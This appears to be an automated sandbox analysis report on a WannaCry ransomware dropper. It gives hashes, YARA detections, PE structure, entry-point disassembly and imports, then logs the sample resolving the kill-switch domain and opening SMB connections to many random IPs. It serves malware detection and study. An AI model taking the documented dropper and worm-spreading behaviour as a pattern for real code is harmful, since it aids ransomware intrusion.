                  notabotnet.x86_64.elfGet hashmaliciousBrowse
                  • 24.215.190.198

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Windows\tasksche.exe

                  Download File
                  Process:C:\Users\user\Desktop\Ee3RWj3ID9.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):3514368
                  Entropy (8bit):4.917919913798441
                  Encrypted:false
                  SSDEEP:49152:nQqMSPbcBVQej/1INRk+TSqTdX1HkQo6SA:QqPoBhz1aRkcSUDk36SA
                  MD5:9B79FA675DFDAAA9E8A2B3FD917BEF0C
                  SHA1:D7F288460DC5AE70D71D0FE81E078EBDF778DB5F
                  SHA-256:B5E8ED118EBDA8BEBD08E69CD2A602866DCA8F0AEBE20429F4EAF31732C9CC38
                  SHA-512:A133436711030C8A62B811770197F93EE0152658D0FFDB18A42A8BAFAB6F8D1CC3FAF45BBA9448BC58BF016FFD4E43BFB3F496C83EA419A746BA6563D4876A99
                  Malicious:true
                  Yara Hits:
                  • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):5.0190100755975715
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Ee3RWj3ID9.exe
                  File size:3723264
                  MD5:b450d58f0d0dc6e3ddbcde263a4e74d4
                  SHA1:e661747c684a4a882d6ffdd4a449d469ed3f9b7b
                  SHA256:999c88589a40c7321c46d3ce53f6c2ca8d0a1ed34601c3c33e2995fd3e066297
                  SHA512:abcd2240b9ccf986be070ab6324d824f0a16b9b1ac517fdae1e1037b7172525581e08ee19372319435bdc27bd589f5bac7561027105001de879a46e8931afb8b
                  SSDEEP:49152:XnEQqMSPbcBVQej/1INRk+TSqTdX1HkQo6SA:XnqPoBhz1aRkcSUDk36SA
                  TLSH:C106335A717CD1FCC106257554A78A67E7F33C9B26FE6A0F8F8049A60D13B18BF90A42
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=..A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L..

                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x409a16
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  DLL Characteristics:
                  Time Stamp:0x4CE78ECC [Sat Nov 20 09:03:08 2010 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:9ecee117164e0b870a53dd187cdd7174

                  Entrypoint Preview

                  Instruction
                  push ebp
                  mov ebp, esp
                  push FFFFFFFFh
                  push 0040A1A0h
                  push 00409BA2h
                  mov eax, dword ptr fs:[00000000h]
                  push eax
                  mov dword ptr fs:[00000000h], esp
                  sub esp, 68h
                  push ebx
                  push esi
                  push edi
                  mov dword ptr [ebp-18h], esp
                  xor ebx, ebx
                  mov dword ptr [ebp-04h], ebx
                  push 00000002h
                  call dword ptr [0040A0C0h]
                  pop ecx
                  or dword ptr [0070F894h], FFFFFFFFh
                  or dword ptr [0070F898h], FFFFFFFFh
                  call dword ptr [0040A0C8h]
                  mov ecx, dword ptr [0070F88Ch]
                  mov dword ptr [eax], ecx
                  call dword ptr [0040A0CCh]
                  mov ecx, dword ptr [0070F888h]
                  mov dword ptr [eax], ecx
                  mov eax, dword ptr [0040A0E4h]
                  mov eax, dword ptr [eax]
                  mov dword ptr [0070F890h], eax
                  call 00007F83249FE361h
                  cmp dword ptr [00431410h], ebx
                  jne 00007F83249FE24Eh
                  push 00409B9Eh
                  call dword ptr [0040A0D4h]
                  pop ecx
                  call 00007F83249FE333h
                  push 0040B010h
                  push 0040B00Ch
                  call 00007F83249FE31Eh
                  mov eax, dword ptr [0070F884h]
                  mov dword ptr [ebp-6Ch], eax
                  lea eax, dword ptr [ebp-6Ch]
                  push eax
                  push dword ptr [0070F880h]
                  lea eax, dword ptr [ebp-64h]
                  push eax
                  lea eax, dword ptr [ebp-70h]
                  push eax
                  lea eax, dword ptr [ebp-60h]
                  push eax
                  call dword ptr [0040A0DCh]
                  push 0040B008h
                  push 0040B000h
                  call 00007F83249FE2EBh

                  Rich Headers

                  Programming Language:
                  • [C++] VS98 (6.0) SP6 build 8804
                  • [EXP] VC++ 6.0 SP5 build 8804

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa1e00xa0.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3100000x35a454.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0xa0000x188.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x8bca0x9000False0.5344509548611112data6.1344811887775705IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0xa0000x9980x1000False0.29345703125data3.503615586181224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xb0000x30489c0x27000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x3100000x35a4540x35b000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  R0x3100a40x35a000PE32 executable (GUI) Intel 80386, for MS WindowsEnglishUnited States
                  RT_VERSION0x66a0a40x3b0dataEnglishUnited States

                  Imports

                  DLLImport
                  KERNEL32.dllWaitForSingleObject, InterlockedIncrement, GetCurrentThreadId, GetCurrentThread, ReadFile, GetFileSize, CreateFileA, MoveFileExA, SizeofResource, TerminateThread, LoadResource, FindResourceA, GetProcAddress, GetModuleHandleW, ExitProcess, GetModuleFileNameA, LocalFree, LocalAlloc, CloseHandle, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, GlobalAlloc, GlobalFree, QueryPerformanceFrequency, QueryPerformanceCounter, GetTickCount, LockResource, Sleep, GetStartupInfoA, GetModuleHandleA
                  ADVAPI32.dllStartServiceCtrlDispatcherA, RegisterServiceCtrlHandlerA, ChangeServiceConfig2A, SetServiceStatus, OpenSCManagerA, CreateServiceA, CloseServiceHandle, StartServiceA, CryptGenRandom, CryptAcquireContextA, OpenServiceA
                  WS2_32.dllclosesocket, recv, send, htonl, ntohl, WSAStartup, inet_ntoa, ioctlsocket, select, htons, socket, connect, inet_addr
                  MSVCP60.dll??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@XZ
                  iphlpapi.dllGetAdaptersInfo, GetPerAdapterInfo
                  WININET.dllInternetOpenA, InternetOpenUrlA, InternetCloseHandle
                  MSVCRT.dll__set_app_type, _stricmp, __p__fmode, __p__commode, _except_handler3, __setusermatherr, _initterm, __getmainargs, _acmdln, _adjust_fdiv, _controlfp, exit, _XcptFilter, _exit, _onexit, __dllonexit, free, ??2@YAPAXI@Z, _ftol, sprintf, _endthreadex, strncpy, rand, _beginthreadex, __CxxFrameHandler, srand, time, __p___argc

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.48.8.8.856572532830018 10/13/22-14:53:07.238751UDP2830018ETPRO TROJAN Observed WannaCry Domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff .com in DNS Lookup)5657253192.168.2.48.8.8.8
                  192.168.2.48.8.8.859683532830018 10/13/22-14:53:08.730651UDP2830018ETPRO TROJAN Observed WannaCry Domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff .com in DNS Lookup)5968353192.168.2.48.8.8.8

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 13, 2022 14:53:03.663264036 CEST49672443192.168.2.4104.212.67.92
                  Oct 13, 2022 14:53:04.850143909 CEST49690443192.168.2.4131.253.33.200
                  Oct 13, 2022 14:53:04.850317001 CEST49690443192.168.2.4131.253.33.200
                  Oct 13, 2022 14:53:04.850452900 CEST49690443192.168.2.4131.253.33.200
                  Oct 13, 2022 14:53:04.850542068 CEST49690443192.168.2.4131.253.33.200
                  Oct 13, 2022 14:53:04.851074934 CEST49690443192.168.2.4131.253.33.200
                  Oct 13, 2022 14:53:04.851104021 CEST49690443192.168.2.4131.253.33.200
                  Oct 13, 2022 14:53:04.851128101 CEST49690443192.168.2.4131.253.33.200
                  Oct 13, 2022 14:53:04.851155043 CEST49690443192.168.2.4131.253.33.200
                  Oct 13, 2022 14:53:04.851180077 CEST49690443192.168.2.4131.253.33.200
                  Oct 13, 2022 14:53:04.874809027 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.874855042 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.874916077 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.874946117 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.874978065 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.875006914 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.875036001 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.875066996 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.875094891 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.875123978 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.875153065 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.875180960 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.875252962 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.875906944 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.875938892 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.875969887 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876009941 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876038074 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876066923 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876096964 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876126051 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876156092 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876183987 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876214027 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876244068 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876271009 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876297951 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876326084 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876353979 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876382113 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876410961 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.876430988 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878241062 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878283024 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878312111 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878355026 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878386021 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878413916 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878443003 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878472090 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878499985 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878526926 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878544092 CEST49690443192.168.2.4131.253.33.200
                  Oct 13, 2022 14:53:04.878559113 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878587961 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878616095 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878643036 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878669977 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878696918 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878724098 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878751993 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878781080 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878808975 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878829002 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878848076 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878899097 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878938913 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878952026 CEST49690443192.168.2.4131.253.33.200
                  Oct 13, 2022 14:53:04.878968000 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.878995895 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879024029 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879050016 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879076958 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879103899 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879131079 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879158974 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879185915 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879213095 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879240036 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879266024 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879292965 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879318953 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879348040 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879375935 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.879405022 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.938765049 CEST44349690131.253.33.200192.168.2.4
                  Oct 13, 2022 14:53:04.939107895 CEST49690443192.168.2.4131.253.33.200
                  Oct 13, 2022 14:53:07.484234095 CEST4969580192.168.2.4103.224.212.220
                  Oct 13, 2022 14:53:07.650676966 CEST8049695103.224.212.220192.168.2.4
                  Oct 13, 2022 14:53:07.650834084 CEST4969580192.168.2.4103.224.212.220
                  Oct 13, 2022 14:53:07.651557922 CEST4969580192.168.2.4103.224.212.220
                  Oct 13, 2022 14:53:07.843688011 CEST8049695103.224.212.220192.168.2.4
                  Oct 13, 2022 14:53:07.843722105 CEST8049695103.224.212.220192.168.2.4
                  Oct 13, 2022 14:53:07.843914986 CEST4969580192.168.2.4103.224.212.220
                  Oct 13, 2022 14:53:07.851731062 CEST4969580192.168.2.4103.224.212.220
                  Oct 13, 2022 14:53:07.887738943 CEST4969680192.168.2.413.248.148.254
                  Oct 13, 2022 14:53:07.907056093 CEST804969613.248.148.254192.168.2.4
                  Oct 13, 2022 14:53:07.907186031 CEST4969680192.168.2.413.248.148.254
                  Oct 13, 2022 14:53:07.925435066 CEST4969680192.168.2.413.248.148.254
                  Oct 13, 2022 14:53:07.944818974 CEST804969613.248.148.254192.168.2.4
                  Oct 13, 2022 14:53:08.018007040 CEST8049695103.224.212.220192.168.2.4
                  Oct 13, 2022 14:53:08.067147017 CEST804969613.248.148.254192.168.2.4
                  Oct 13, 2022 14:53:08.067308903 CEST4969680192.168.2.413.248.148.254
                  Oct 13, 2022 14:53:08.952327967 CEST4969780192.168.2.4103.224.212.220
                  Oct 13, 2022 14:53:09.120743036 CEST8049697103.224.212.220192.168.2.4
                  Oct 13, 2022 14:53:09.120910883 CEST4969780192.168.2.4103.224.212.220
                  Oct 13, 2022 14:53:09.121608019 CEST4969780192.168.2.4103.224.212.220
                  Oct 13, 2022 14:53:09.317599058 CEST8049697103.224.212.220192.168.2.4
                  Oct 13, 2022 14:53:09.318192005 CEST4969780192.168.2.4103.224.212.220
                  Oct 13, 2022 14:53:09.358640909 CEST4969780192.168.2.4103.224.212.220
                  Oct 13, 2022 14:53:09.394592047 CEST4969880192.168.2.413.248.148.254
                  Oct 13, 2022 14:53:09.413491011 CEST804969813.248.148.254192.168.2.4
                  Oct 13, 2022 14:53:09.413645029 CEST4969880192.168.2.413.248.148.254
                  Oct 13, 2022 14:53:09.414812088 CEST4969880192.168.2.413.248.148.254
                  Oct 13, 2022 14:53:09.433625937 CEST804969813.248.148.254192.168.2.4
                  Oct 13, 2022 14:53:09.527364969 CEST8049697103.224.212.220192.168.2.4
                  Oct 13, 2022 14:53:09.559794903 CEST804969813.248.148.254192.168.2.4
                  Oct 13, 2022 14:53:09.559931040 CEST4969880192.168.2.413.248.148.254
                  Oct 13, 2022 14:53:09.590480089 CEST49699445192.168.2.422.112.92.57
                  Oct 13, 2022 14:53:10.711124897 CEST49713445192.168.2.4152.93.164.24
                  Oct 13, 2022 14:53:11.552144051 CEST4969680192.168.2.413.248.148.254
                  Oct 13, 2022 14:53:11.603827000 CEST49719445192.168.2.482.159.150.60
                  Oct 13, 2022 14:53:11.836915016 CEST49723445192.168.2.4128.70.6.5
                  Oct 13, 2022 14:53:12.733201027 CEST49732445192.168.2.4101.112.150.223
                  Oct 13, 2022 14:53:12.967807055 CEST49734445192.168.2.47.155.26.73
                  Oct 13, 2022 14:53:13.642374992 CEST49745445192.168.2.486.18.106.89
                  Oct 13, 2022 14:53:13.852092981 CEST49749445192.168.2.4157.83.127.34
                  Oct 13, 2022 14:53:14.076656103 CEST49751445192.168.2.466.245.173.111
                  Oct 13, 2022 14:53:14.759948015 CEST49759445192.168.2.4144.213.131.20
                  Oct 13, 2022 14:53:14.977539062 CEST49763445192.168.2.484.166.206.203
                  Oct 13, 2022 14:53:15.180928946 CEST49765445192.168.2.484.30.239.197
                  Oct 13, 2022 14:53:15.653083086 CEST49771445192.168.2.4118.11.54.59
                  Oct 13, 2022 14:53:15.884099960 CEST49776445192.168.2.468.202.11.27
                  Oct 13, 2022 14:53:16.102735043 CEST49778445192.168.2.4179.135.185.160
                  Oct 13, 2022 14:53:16.305685043 CEST49780445192.168.2.49.144.43.218
                  Oct 13, 2022 14:53:16.793735027 CEST49788445192.168.2.465.44.74.67
                  Oct 13, 2022 14:53:17.008810997 CEST49792445192.168.2.421.247.89.44
                  Oct 13, 2022 14:53:17.227325916 CEST49794445192.168.2.4193.254.239.111
                  Oct 13, 2022 14:53:17.446149111 CEST49796445192.168.2.4156.76.110.170
                  Oct 13, 2022 14:53:17.666423082 CEST49799445192.168.2.4195.69.133.197
                  Oct 13, 2022 14:53:17.903482914 CEST49803445192.168.2.4223.225.190.118
                  Oct 13, 2022 14:53:18.118331909 CEST49808445192.168.2.438.157.20.33
                  Oct 13, 2022 14:53:18.353101015 CEST49810445192.168.2.464.104.40.138
                  Oct 13, 2022 14:53:18.572201014 CEST49812445192.168.2.4210.130.109.69
                  Oct 13, 2022 14:53:18.774827003 CEST49816445192.168.2.421.195.231.130
                  Oct 13, 2022 14:53:19.009270906 CEST49821445192.168.2.4100.61.131.181
                  Oct 13, 2022 14:53:19.229140043 CEST49825445192.168.2.4102.207.231.61
                  Oct 13, 2022 14:53:19.479300022 CEST49827445192.168.2.442.34.73.48
                  Oct 13, 2022 14:53:19.683427095 CEST49829445192.168.2.4150.94.153.50
                  Oct 13, 2022 14:53:19.697366953 CEST49830445192.168.2.448.17.92.96
                  Oct 13, 2022 14:53:19.883969069 CEST49834445192.168.2.491.219.89.19
                  Oct 13, 2022 14:53:20.134766102 CEST49839445192.168.2.4101.224.153.166
                  Oct 13, 2022 14:53:20.473731995 CEST49842445192.168.2.4128.91.138.1
                  Oct 13, 2022 14:53:20.674416065 CEST49844445192.168.2.479.56.248.51
                  Oct 13, 2022 14:53:20.852679014 CEST49846445192.168.2.4166.208.112.233
                  Oct 13, 2022 14:53:20.853174925 CEST49847445192.168.2.4194.196.117.106
                  Oct 13, 2022 14:53:21.071623087 CEST49850445192.168.2.4209.117.77.161
                  Oct 13, 2022 14:53:21.290885925 CEST49854445192.168.2.4105.103.2.199
                  Oct 13, 2022 14:53:21.609890938 CEST49857445192.168.2.4195.177.162.29
                  Oct 13, 2022 14:53:22.224962950 CEST49860445192.168.2.4192.189.198.53
                  Oct 13, 2022 14:53:22.373048067 CEST49862445192.168.2.49.220.38.72
                  Oct 13, 2022 14:53:22.373519897 CEST49863445192.168.2.474.170.195.38
                  Oct 13, 2022 14:53:22.374121904 CEST49864445192.168.2.4223.237.180.144
                  Oct 13, 2022 14:53:22.377357006 CEST49865445192.168.2.416.202.23.109
                  Oct 13, 2022 14:53:22.419543028 CEST49867445192.168.2.441.211.127.159
                  Oct 13, 2022 14:53:22.727864027 CEST49872445192.168.2.440.251.9.253
                  Oct 13, 2022 14:53:24.110048056 CEST49875445192.168.2.499.206.175.65
                  Oct 13, 2022 14:53:24.112201929 CEST49876445192.168.2.4214.104.216.244
                  Oct 13, 2022 14:53:24.113899946 CEST49877445192.168.2.485.2.166.149
                  Oct 13, 2022 14:53:24.113940001 CEST49879445192.168.2.4133.205.235.65
                  Oct 13, 2022 14:53:24.113981962 CEST49878445192.168.2.493.137.35.118
                  Oct 13, 2022 14:53:24.114047050 CEST49881445192.168.2.433.28.204.208
                  Oct 13, 2022 14:53:24.114073038 CEST49880445192.168.2.471.121.254.216
                  Oct 13, 2022 14:53:24.255484104 CEST49885445192.168.2.444.210.106.36
                  Oct 13, 2022 14:53:25.229115963 CEST49895445192.168.2.4210.122.145.0
                  Oct 13, 2022 14:53:25.229808092 CEST49896445192.168.2.462.216.117.160
                  Oct 13, 2022 14:53:25.230773926 CEST49897445192.168.2.437.191.135.34
                  Oct 13, 2022 14:53:25.231703997 CEST49898445192.168.2.4182.60.242.133
                  Oct 13, 2022 14:53:25.232517004 CEST49899445192.168.2.4103.175.233.103
                  Oct 13, 2022 14:53:25.233196974 CEST49900445192.168.2.436.202.17.78
                  Oct 13, 2022 14:53:25.234117985 CEST49901445192.168.2.4157.218.34.185
                  Oct 13, 2022 14:53:25.386998892 CEST49903445192.168.2.4130.156.188.104
                  Oct 13, 2022 14:53:26.267491102 CEST49914445192.168.2.476.56.91.229
                  Oct 13, 2022 14:53:26.389331102 CEST49915445192.168.2.4219.115.160.152
                  Oct 13, 2022 14:53:26.392154932 CEST49916445192.168.2.4192.42.176.143
                  Oct 13, 2022 14:53:26.392864943 CEST49917445192.168.2.4165.195.56.68
                  Oct 13, 2022 14:53:26.392985106 CEST49918445192.168.2.4146.117.248.30
                  Oct 13, 2022 14:53:26.393095016 CEST49919445192.168.2.472.167.239.132
                  Oct 13, 2022 14:53:26.393130064 CEST49920445192.168.2.461.137.118.251
                  Oct 13, 2022 14:53:26.393187046 CEST49921445192.168.2.479.80.174.160
                  Oct 13, 2022 14:53:26.509249926 CEST49924445192.168.2.4170.105.216.141
                  Oct 13, 2022 14:53:27.385586023 CEST49934445192.168.2.439.227.210.161
                  Oct 13, 2022 14:53:27.497255087 CEST49937445192.168.2.4105.58.208.6
                  Oct 13, 2022 14:53:27.498886108 CEST49938445192.168.2.4101.184.67.196
                  Oct 13, 2022 14:53:27.498946905 CEST49940445192.168.2.4187.87.120.191
                  Oct 13, 2022 14:53:27.499028921 CEST49939445192.168.2.499.110.103.126
                  Oct 13, 2022 14:53:27.499036074 CEST49941445192.168.2.4223.18.10.204
                  Oct 13, 2022 14:53:27.499066114 CEST49942445192.168.2.485.201.103.98
                  Oct 13, 2022 14:53:27.499180079 CEST49943445192.168.2.428.92.129.222
                  Oct 13, 2022 14:53:27.634171009 CEST49946445192.168.2.429.187.80.155
                  Oct 13, 2022 14:53:28.275192022 CEST49954445192.168.2.471.134.2.127
                  Oct 13, 2022 14:53:28.493702888 CEST49956445192.168.2.431.240.226.95
                  Oct 13, 2022 14:53:28.619079113 CEST49959445192.168.2.414.180.156.20
                  Oct 13, 2022 14:53:28.619925976 CEST49960445192.168.2.4103.202.198.215
                  Oct 13, 2022 14:53:28.620753050 CEST49961445192.168.2.47.46.145.182
                  Oct 13, 2022 14:53:28.621445894 CEST49962445192.168.2.4195.111.131.141
                  Oct 13, 2022 14:53:28.622297049 CEST49963445192.168.2.462.65.196.20
                  Oct 13, 2022 14:53:28.622977972 CEST49964445192.168.2.4109.225.164.220
                  Oct 13, 2022 14:53:28.623728037 CEST49965445192.168.2.4174.213.98.230
                  Oct 13, 2022 14:53:28.778069019 CEST49969445192.168.2.4111.147.109.180
                  Oct 13, 2022 14:53:29.385030985 CEST49975445192.168.2.4120.166.207.109
                  Oct 13, 2022 14:53:29.603614092 CEST49978445192.168.2.428.91.16.100
                  Oct 13, 2022 14:53:29.752696991 CEST49982445192.168.2.4177.212.6.174
                  Oct 13, 2022 14:53:29.753242016 CEST49983445192.168.2.4100.83.20.80
                  Oct 13, 2022 14:53:29.753786087 CEST49984445192.168.2.4195.83.42.167
                  Oct 13, 2022 14:53:29.754364014 CEST49985445192.168.2.4195.120.32.27
                  Oct 13, 2022 14:53:29.754834890 CEST49986445192.168.2.4192.68.126.23
                  Oct 13, 2022 14:53:29.755394936 CEST49987445192.168.2.4181.123.175.234
                  Oct 13, 2022 14:53:29.755953074 CEST49988445192.168.2.4205.187.94.67
                  Oct 13, 2022 14:53:29.905610085 CEST49991445192.168.2.455.109.104.123
                  Oct 13, 2022 14:53:30.309298038 CEST49995445192.168.2.467.106.172.247
                  Oct 13, 2022 14:53:30.526210070 CEST49997445192.168.2.4199.170.246.183
                  Oct 13, 2022 14:53:30.751786947 CEST50002445192.168.2.499.232.220.73
                  Oct 13, 2022 14:53:30.863476992 CEST50004445192.168.2.4145.76.140.234
                  Oct 13, 2022 14:53:30.864011049 CEST50005445192.168.2.487.169.67.225
                  Oct 13, 2022 14:53:30.866456985 CEST50006445192.168.2.452.205.19.223
                  Oct 13, 2022 14:53:30.867105961 CEST50007445192.168.2.4117.26.145.81
                  Oct 13, 2022 14:53:30.867176056 CEST50009445192.168.2.487.68.154.243
